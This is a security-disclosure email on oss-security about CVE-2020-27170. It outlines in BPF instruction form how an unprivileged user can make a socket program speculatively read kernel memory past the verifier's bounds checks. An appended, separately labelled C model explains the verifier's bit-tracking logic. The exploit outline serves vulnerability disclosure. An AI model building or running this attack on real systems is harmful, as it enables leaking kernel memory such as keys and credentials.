Message-ID: <CAFzhf4rREUjn4=Z45GBxvo4CAvf5=xPEiu3O0rpnWF3hR-7AxQ@mail.gmail.com>
Date: Wed, 24 Mar 2021 19:34:50 +0000
From: Piotr Krysiuk <piotras@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: [CVE-2020-27170] Protection against speculatively out-of-bounds
 loads in the Linux kernel can be bypassed by unprivileged local users to leak
 content of kernel memory

Some details of how CVE-2020-27170 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.

As the embargo expires today, I was asked to share these details
publicly on oss-security.

The CVE-2020-27170 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:

    load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively unbounded pointer arithmetic
    BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),

    // speculatively unbounded load
    BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX,
                offsetof(struct __sk_buff, protocol)),

    transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.
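As an added illustration (not code from the post or from the kernel), the following model reproduces the tristate-number (tnum) algebra the BPF verifier uses to track which bits of a register are known, to show why the two BPF_AND steps above leave the verifier with a "known zero" register even though the hardware still has to wait for the slow load before it can compute the same result. Function names other than tnum_and/tnum_const/tnum_unknown are assumptions for this example.

```c
/* Model of the verifier's tnum tracking; added example, not kernel code.
 * tnum_and() follows the same algebra as kernel/bpf/tnum.c. */
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>

struct tnum { uint64_t value; uint64_t mask; }; /* mask bit set => bit unknown */

static struct tnum tnum_const(uint64_t v) { return (struct tnum){ v, 0 }; }
static struct tnum tnum_unknown(void)    { return (struct tnum){ 0, ~0ULL }; }
static bool tnum_is_const(struct tnum t) { return t.mask == 0; }

/* A bit known to be 0 in either operand is known to be 0 in the result. */
static struct tnum tnum_and(struct tnum a, struct tnum b)
{
    uint64_t alpha = a.value | a.mask;   /* bits that may be 1 in a */
    uint64_t beta  = b.value | b.mask;   /* bits that may be 1 in b */
    uint64_t v     = a.value & b.value;  /* bits known to be 1 in both */
    return (struct tnum){ v, alpha & beta & ~v };
}

/* Verifier view of BPF_REG_SLOW_CHECK after the first AND: a freshly loaded
 * map value is fully unknown; AND 1 leaves only bit 0 unknown ({0, mask 1}). */
struct tnum verifier_view_after_first_and(void)
{
    return tnum_and(tnum_unknown(), tnum_const(1));
}

/* ... and after the second AND: bit 0 and bit 1 can never both be set,
 * so the verifier concludes the register is the constant 0 ({0, mask 0}). */
struct tnum verifier_view_after_second_and(void)
{
    return tnum_and(verifier_view_after_first_and(), tnum_const(2));
}

/* What the CPU computes for a concrete loaded value: also always 0, but
 * only available once the slow load has actually returned (the dependency
 * the verifier's constant folding does not see). */
uint64_t hardware_value_after_masks(uint64_t loaded)
{
    return (loaded & 1) & 2;
}

int main(void)
{
    struct tnum r = verifier_view_after_second_and();
    printf("verifier: value=%llu mask=%llu known-const=%d\n",
           (unsigned long long)r.value, (unsigned long long)r.mask,
           tnum_is_const(r));
    return 0;
}
```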
